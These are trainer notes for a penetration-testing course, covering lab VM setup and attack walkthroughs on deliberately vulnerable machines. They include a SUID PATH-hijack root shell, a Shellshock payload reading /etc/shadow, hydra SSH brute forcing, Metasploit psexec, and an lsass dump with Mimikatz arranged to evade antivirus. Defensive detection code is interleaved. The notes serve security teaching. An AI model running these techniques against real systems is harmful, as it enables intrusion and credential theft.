Trainer Notes
www.pecb.com
Contents:
Symbols used across the document ..... 3
Basic Nmap / SMB NSE Scripts ..... 26
  Enumeration of Users ..... 26
  Enumeration of Shares ..... 26
  Brute forcing accounts ..... 26
  Basic Vulnerability checking ..... 26
  Sessions Enumerations ..... 27
  Enumeration of Users ..... 27
Advanced Enumerations ..... 28
  LDAP Enumeration using NMAP Scripts ..... 28
  LDAP Brute Force (only for reference) ..... 28
TRAINER CHECKS: ..... 30
Note for trainers: ..... 37
Symbols used across the document:
Tools
Code
CMD
URL/Website
Task/Exercise/Activity
VM – {name}
Running the Labs (Virtual Machines)
The labs are designed to be downloaded from online resources on the Internet and to run offline in a classroom with at least a router/switch or Wi-Fi device with DHCP enabled.
Where to Download
a) Course Materials (including software to run the Virtual Machines)
URL/Website https://mega.co.nz/#F!NwcQVYYB
(Decryption Key = “uVSuAlkt8T4mKYpHvwLu5Q” without the quotes)
URL/Website https://mega.co.nz/#F!ZksExZBC
(Decryption Key = “vuLLCcZUu4KZbY6zvTI_mg” without the quotes)
Sync URL
https://link.getsync.com/#f=LABS&sz=0&t=2&s=MK26ICHL7WA7I3PGULOKBFCKVSQ774NPIFHUN55MUUR5H7NUM3UQ&i=CMIXP3HKFAVTEQUMOYBWC7UKQL4CKPCQC&v=2.0
Software needed to run the VMs
All the below tools can be found within the Toolz folder within the Course Material links.
http://www.vmware.com/products/fusion/fusion-evaluation
For example, after importing the VMs into VirtualBox, check that the adapters are using your current NAT Network configuration or DHCP.
You may have to add a NAT Network configuration (including the IP range).
LABs Configuration & Setup
In this scenario each student manages their own NAT/network using either VirtualBox or VMware and configures the services accordingly.
If the time needed to distribute the Virtual Machines allows it, we recommend this configuration.
(Normally the LABs will be used within the second day of the course.)
Configuration (b) – Trainer non-isolated environment.
In this scenario all VMs use a Bridged Network configuration in which the IPs are
obtained via a DHCP Router/WiFi and reachable to the students through the same
network segment.
This configuration will be easier to set up for the initial ‘discovery modules’ but harder to maintain the further the students advance during the hacking activities, particularly when assessing the Linux environment, as they may start modifying (or even rebooting) the system several times.
This configuration will allow the students to use the Kali Linux Virtual Machine as a
‘trampoline’ to assess the rest of the environment.
We recommend, though, using a Bridged network when working with the Web App
Virtual Machine so students can use their own laptops with graphical interfaces to run
the assessments.
Further Notes:
We assume the instructor will be familiar with the use of Virtual Machines, routers, Wi-Fi configurations and IP addressing on multiple OSes.
The larger VMs are the Windows labs, which could be run on the trainer’s laptop at all times, as most exercises revolve around network discovery.
The configurations explained before are merely examples and a combination of them could be used, including using students’ own material and laptops, to run the exercises and labs more efficiently.
Please review the DNS configuration on the Windows boxes (Windows 7 and Windows 8.1) to make sure they can access the Domain Controller on the Windows 2008 R2 Server.
The following screenshots show how to verify the connectivity with the Domain
Controller and Active Directory server.
Figure 4 - Domain Controller IP Address
Figure 6 - Checking if the Domain User names are valid
Labs – Virtual Machines
Windows VMs
PECB-win7.sys.lab / Windows 7 Pro - Admin/P@ssw0rd!!
PECB-DC.sys.lab / Windows Server 2008 - Administrator/P@ssw0rd!!
PECB-Win8.sys.lab / Windows 8.1 - Admin/P@ssw0rd!!
(Check keyboard configuration if you are having trouble entering the passwords)
Windows Boxes should have a folder with Mimikatz and other tools on it.
Figure 8 - Toolz Folder on user Admin
To allow Mimikatz to pull a user’s password from memory, make sure you access some Windows (shared) resources before using it.
For example: open \\pecb-dc in Windows Explorer and log in as syslab\jack.russell.
The debug privilege allows someone to debug a process that they wouldn’t otherwise
have access to. For example, a process running as a user with the debug privilege
enabled on its token can debug a service running as local system.
More from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx
mimikatz # privilege::debug
Privilege '20' OK
Remark: the error "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061" means that the required privilege is not held by the client (usually because you are not running as an administrator).
Pass the Hash: further information (optional reading & exploit modules)
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-sekurlsa#pth
https://www.youtube.com/watch?feature=player_embedded&v=x-bIZRU-eLM
http://tools.kali.org/password-attacks/keimpx
https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
Linux Lab & VM
msfadmin/password are the credentials to login.
Root password is ‘Qazwsx12+1!’
Webserver for exploiting the Shellshock vulnerability is set to start automatically.
A vulnerable SETUID root file (bedrock) sits in the msfadmin home directory.
Create a custom ‘ls’ file in that directory (its contents are listed under step g) below) and make it executable:
msfadmin@linuxbox:~$ nano ls
msfadmin@linuxbox:~$ chmod 755 ls
Next the PATH variable needs to be changed so that the current directory is searched first:
msfadmin@linuxbox:~$ export PATH="."
Running the ‘bedrock’ executable now creates a SETUID root shell in /tmp:
msfadmin@linuxbox:~$ ./bedrock
To test whether we can execute commands as root, try the following:
msfadmin@linuxbox:~$ /sbin/poweroff
poweroff: Need to be root
Now execute the SUID shell and run the poweroff command again ;)
msfadmin@linuxbox:~$ /tmp/sh
# /sbin/poweroff
a) Find SGID or SUID files using the following (the parentheses make the -type f test apply to both branches):
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
b) Look at the binary to see if you can figure out what it does:
c) run strings on the binary
d) run strace (specifically strace -qfeexecve ./bedrock) to see what other programs it calls
e) look at the permissions of other programs
f) if system binaries are called, look at how they are called and whether you can change the PATH variable to exploit them
g) change PATH to "." and drop in a custom "ls" file containing the following:
/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh
The SUID root shell needs to be called 'sh' or run with the '-p' parameter to get past bash’s protection (bash drops root privileges when run SUID).
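As a defensive contrast to the bedrock PATH hijack above, the following Python wrapper (example code written for these notes, not part of the original lab material) shows how a privileged program should launch helpers so that a PATH="." trick has no effect: bare command names are resolved only against a fixed list of trusted directories, relative names are refused, and the child process gets a scrubbed environment. The trusted directory list and the helper names are assumptions.

```python
"""Hardened launcher for helpers of a privileged program (added example)."""
import os
import shutil
import stat
import subprocess
import tempfile

# Only these directories are ever searched; the caller's PATH (e.g. ".") is ignored.
TRUSTED_DIRS = ("/usr/bin", "/bin", "/usr/sbin", "/sbin")   # assumption: typical Linux layout
SAFE_ENV = {"PATH": ":".join(TRUSTED_DIRS), "LC_ALL": "C"}


def resolve_trusted(cmd: str) -> str:
    """Map a bare command name to an absolute path inside TRUSTED_DIRS.

    Names containing '/' are rejected outright: a relative path such as ./ls
    would resolve against the current directory, which is exactly the hole
    the bedrock binary has.
    """
    if not cmd or "/" in cmd:
        raise ValueError(f"refusing non-bare command name: {cmd!r}")
    found = shutil.which(cmd, path=SAFE_ENV["PATH"])
    if found is None:
        raise FileNotFoundError(f"{cmd} not found in trusted directories")
    return found


def run_trusted(cmd: str, *args: str) -> str:
    """Run cmd from TRUSTED_DIRS with a scrubbed environment and return stdout."""
    exe = resolve_trusted(cmd)
    proc = subprocess.run([exe, *args], env=SAFE_ENV, capture_output=True,
                          text=True, check=False)
    return proc.stdout


def wrapper_ignores_cwd_ls() -> bool:
    """Plant a harmless fake 'ls' in a scratch directory, make it the working
    directory (the bedrock scenario with PATH="."), and confirm the wrapper
    still runs the trusted ls, which simply lists the scratch directory."""
    with tempfile.TemporaryDirectory() as scratch:
        fake = os.path.join(scratch, "ls")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho PLANTED\n")
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        previous = os.getcwd()
        os.chdir(scratch)
        try:
            out = run_trusted("ls")          # real ls: prints the one file, "ls"
        finally:
            os.chdir(previous)
    return "PLANTED" not in out and "ls" in out
```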
SHELLSHOCK exploit:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/shadow" http://127.0.0.1/cgi-bin/test.cgi
The Apache user www-data was added to the shadow group so that it can read the shadow file.
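Added example (not from the original material): detection logic for the request above as it appears in an Apache access log. The log lines are constructed; the first mirrors the wget probe, the third carries the same marker in the Referer header, and the second is benign.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache combined-format logs."""
import re

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# The trigger is a bash function definition "() {" placed in data that a CGI
# handler exports into the environment (User-Agent, Referer, query string).
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Constructed sample lines (not real traffic); Apache escapes quotes as \" in the agent field.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Sep/2015:10:15:32 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1523 "-" "() { test;};echo \\"Content-type: text/plain\\"; echo; echo; /bin/cat /etc/shadow"
10.10.10.5 - - [10/Sep/2015:10:15:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 42 "-" "Mozilla/5.0"
10.10.10.6 - - [10/Sep/2015:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "() { :;}; /bin/ping -c 1 10.10.10.99" "curl/7.38"
"""


def detect_shellshock(log_text):
    """Return one finding per line whose request, referer or agent carries the
    "() {" marker. Lines that do not parse are reported as well, because a
    probe may deliberately break the log format."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = COMBINED.match(line)
        if m is None:
            findings.append({"ip": "?", "field": "unparsed", "evidence": line[:80]})
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK.search(m.group(field)):
                findings.append({"ip": m.group("ip"), "field": field,
                                 "evidence": m.group(field)[:80]})
                break   # one finding per line is enough for alerting
    return findings
```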
More information on the VM and the other Web Apps installed on it can be found at
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
If you want to download a fresh/vanilla VM for these exercises, please follow this link:
http://sourceforge.net/projects/owaspbwa/files/
Figure 10 - Access to all Web Apps within the Virtual Machine
Figure 11 - Web Application chosen for the course
If you need to delete the history for other students to use the VM, please type the following command:
If the SSH service shows a minus sign (-) it means that it is not ‘running’.
b) Now we need to load the default SSH run level by issuing the following command:
root@kali:~# update-rc.d -f ssh defaults
You can create a login banner, also known as a Message of the Day (MOTD) banner, on Kali Linux that is displayed when users log in.
Just edit the /etc/motd file (restart ssh after you have completed the edit).
Edit the following file and add your text:
root@kali:~# vi /etc/motd
root@kali:~# service ssh restart
-----------------------------------------------------------------
Warning: This system is restricted to private use
authorized users for business purposes only. Unauthorized access
or use is a violation of company policy and the law. This system
may be monitored for administrative and security reasons. By
proceeding, you acknowledge that (1) you have read and understand
this notice and (2) you consent to the system monitoring.
-----------------------------------------------------------------
How to create a new normal user with sudo permission in Kali Linux
Open a terminal and issue the following command:
root@kali:~# useradd -m <username>
Then add the user to the sudo group with usermod: the option -a means append and '-G sudo' names the sudo group as the one to add the user to.
If you want to know more about the usermod command, see man usermod.
Now we have to specify the shell for our new user:
root@kali:~# chsh -s /bin/bash <username>
Exercises & Tools
DNS
Slide: Domain Name System (DNS) – Basics
$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.
Nmap:
dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy
blacklists and returns a list of services for which an IP has been flagged. Checks may
be limited by service category (eg: SPAM, PROXY) or to a specific service name.
dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common
subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate
common DNS SRV records.
dns-cache-snoop
Performs DNS cache snooping against a DNS server.
dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The
configuration checks are divided into categories which each have a number of
different tests.
dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to
specify the subnet that queries supposedly originate from. The script uses this option
to supply a number of geographically distributed locations in an attempt to enumerate
as many different address records as possible. The script also supports requests
using a given subnet.
dns-fuzz
Launches a DNS fuzzing attack against DNS servers.
dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which
analyzes DNS server response codes to dramatically reduce the number of queries
needed to enumerate large networks.
dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.
dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC
NSEC3 records.
dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its id.server and version.bind values. This script performs the same queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target
dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable
source ports can make a DNS server vulnerable to cache poisoning attacks (see
CVE-2008-1447).
dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability.
Predictable TXID values can make a DNS server vulnerable to cache poisoning
attacks (see CVE-2008-1447).
dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that
recursion will be enabled on your own internal nameservers.
dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery
protocol.
dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The service records contain the hostname, port and priority of servers for a given service. The following services are enumerated by the script:
- Active Directory Global Catalog
- Exchange Autodiscovery
- Kerberos KDC Service
- Kerberos Passwd Change Service
- LDAP Servers
- SIP Servers
- XMPP S2S
- XMPP C2S
dns-update
Attempts to perform a dynamic DNS update without authentication.
dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @
abuse.ch. Please review the following information before you start to scan:
https://zeustracker.abuse.ch/ztdns.php
dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.
Basic Windows Port Scanning / Windows Service mapping
Basic Port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host
TCPDump
http://www.tcpdump.org
tcpdump -nnvv -i eth0 'tcp[tcpflags] & tcp-syn != 0 and not port 22 and host 172.16.204.143'
Common tcpdump filters (syntax, followed by an example):
specific source host: tcpdump 'src host <ipaddress>' (e.g. tcpdump 'src host 10.10.10.1')
specific destination host: tcpdump 'dst host <ipaddress>' (e.g. tcpdump 'dst host 10.10.10.1')
specific source network: tcpdump 'src net <network address>' (e.g. tcpdump 'src net 10.10.10.0')
specific destination network: tcpdump 'dst net <network address>' (e.g. tcpdump 'dst net 10.10.10.0')
specific source port: tcpdump 'src port <port-number>' (e.g. tcpdump 'src port 21')
specific destination port: tcpdump 'dst port <port-number>' (e.g. tcpdump 'dst port 21')
specific host and a particular port: tcpdump 'host <ipaddress> and port <port-number>' (e.g. tcpdump 'host 10.10.10.1 and port 21')
specific host, all ports except SSH: tcpdump 'host <ipaddress> and port not <port-number>' (e.g. tcpdump 'host 10.10.10.1 and port not 22')
specific port on a particular interface: tcpdump -i <interface> 'port <port-number>' (e.g. tcpdump -i eth1 'port 21')
Wireshark
https://www.wireshark.org
Example
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -U -o -u "user" -p "password" <host>
Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -S -o <host>
Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>
(Requires any access higher than anonymous; guests, users, or administrators are
all able to perform this request on Windows 2000, XP, 2003, and Vista.)
Finding open shares is useful to a penetration tester because there may be private
files shared, or, if it's writable, it could be a good place to drop a Trojan or to infect a
file that's already there. Knowing where the share is could make those kinds of tests
more useful, except that determining where the share is requires administrative
privileges already.
Enumeration of Users
From a pen-tester’s perspective, retrieving the list of users on any given server creates endless possibilities.
Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html
Credit for pioneering some of the techniques used by this script goes to the enum.exe, sid2user.exe and user2sid.exe programs, which illustrated SID/RID walking techniques and gave insight into how Microsoft Windows handled null sessions in the past, allowing anonymous users to call functions such as QueryDisplayInfo, which returns a detailed list of users along with descriptions, types and full names.
This type of enumeration was also used to determine whether users have recently changed their passwords (the date of last update), whether their accounts are locked, or even whether they have never logged in to the system.
This is useful information for a pen tester (and for attackers) when choosing accounts to target for password guessing or password brute forcing attacks.
Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-nmap-scanning-engine-33138
Advanced Enumerations
Activity / Apply enumeration techniques learnt with Windows
boxes against *nix systems
(Optional - Create two accounts trivially bruteforceable on the Linux box)
Hydra example
hydra -l msfadmin -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://172.16.204.142
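Added example (not part of the original notes): what the hydra run above looks like from the target’s side, and a small detector for it over sshd auth.log lines. The log lines are constructed for the linuxbox target; the guessing host’s address 172.16.204.1 and the thresholds are assumptions.

```python
"""Detect SSH password-guessing bursts in sshd auth.log output."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
SSHD = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

# Constructed sample: six failures in six seconds from one source (a hydra-style
# run with -t 6), a success from the same source shortly after, plus background noise.
SAMPLE_AUTH_LOG = "\n".join(
    [f"Sep 10 10:20:{s:02d} linuxbox sshd[21{s:02d}]: Failed password for msfadmin "
     f"from 172.16.204.1 port 5{s:04d} ssh2" for s in range(1, 7)]
    + ["Sep 10 10:20:09 linuxbox sshd[2109]: Accepted password for msfadmin "
       "from 172.16.204.1 port 50007 ssh2",
       "Sep 10 10:25:00 linuxbox sshd[2200]: Failed password for root "
       "from 10.10.10.7 port 40000 ssh2",
       "Sep 10 10:40:00 linuxbox sshd[2300]: Accepted password for msfadmin "
       "from 10.10.10.8 port 40100 ssh2"]
)


def detect_ssh_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: summary} for every source with >= threshold failed logins
    inside any window-long span. An Accepted login from the same source after
    the burst is recorded as a likely successful guess, the case to escalate."""
    events = defaultdict(list)            # ip -> [(time, result, user)]
    for line in log_text.splitlines():
        m = SSHD.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
            events[m.group("ip")].append((ts, m.group("result"), m.group("user")))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [t for t, r, _ in evs if r == "Failed"]
        burst = any(sum(1 for t in fails[i:] if t - start <= window) >= threshold
                    for i, start in enumerate(fails))   # sliding window over failures
        if not burst:
            continue
        success = [u for t, r, u in evs if r == "Accepted" and t > fails[-1]]
        alerts[ip] = {"failures": len(fails),
                      "users": sorted({u for _, _, u in evs}),
                      "success_after_burst": success[0] if success else None}
    return alerts
```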
http://portswigger.net/burp/download.html
http://portswigger.net/burp/burpsuite_free_v1.6.jar
http://www.telerik.com/fiddler
The idea of these basic exercises is to set up the Burp proxy to identify these common vulnerabilities in a vulnerable web site.
If there is Internet access, students can also work over the following URL:
https://google-gruyere.appspot.com/start
TRAINER CHECKS:
Open these web apps and familiarise yourself with the examples and exploits.
If network and time allow, show a full exploitation of an XSS bug by stealing someone’s credentials.
The duration of this activity should be no longer than 30 minutes. It usually takes time for inexperienced web app testers to set up the required environment.
XSS and SQLi vulnerabilities can be identified even without specific tools, by observing the web app behaviour and inspecting the client-side source code.
Windows 8 Pen Test attack scenarios:
a) Bruteforce the password for the domain account john.smith (which is a local admin) on the Windows 8 system using Metasploit’s SMB login checker module
[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes
root@kali:~# msfconsole
RHOSTS => 10.0.2.7
msf auxiliary(psexec_command) > set SMBPass P@ssw0rd!!
SMBPass => P@ssw0rd!!
msf auxiliary(psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_command) > exploit
Figure 14 - Using Veil Framework on Kali Linux
To install Veil Framework on a fresh Kali Linux type: apt-get install veil
2. Copy PsExec and Procdump over to the target machine using the credentials just discovered. Use mount (*nix) or net use (Windows) to mount the folder and then copy the files over.
*nix: mount -t cifs //target/C$ /mnt/target -o username=adminuser,password=password,domain=targetdomain
Windows: net use e: \\target\C$ password /user:domain\adminuser
3. Log in to the system using Terminal Services and get a command shell. The user john.smith is a local admin; however, to get a process dump of the lsass.exe process a SYSTEM user is required. The following command should be used to get a SYSTEM shell:
psexec -i -s -d cmd
4. Run the following procdump command to dump the lsass.exe process memory. Using this method, no ‘hacking tools’ are uploaded to the target machine, which avoids triggering AV:
5. Copy the output dump file back over the mount point created in step 2 and launch Mimikatz locally. Remember to use the same architecture (x86 or x64) as the system the process dump came from. Use the following commands within Mimikatz to get cleartext passwords from the process dump:
6. This should reveal the password of a domain admin account that can then be used to log in to the DC and gain control over it.
If you need to activate the local Administrator account on Windows 8.1 (it comes deactivated by default on fresh installs), type the following: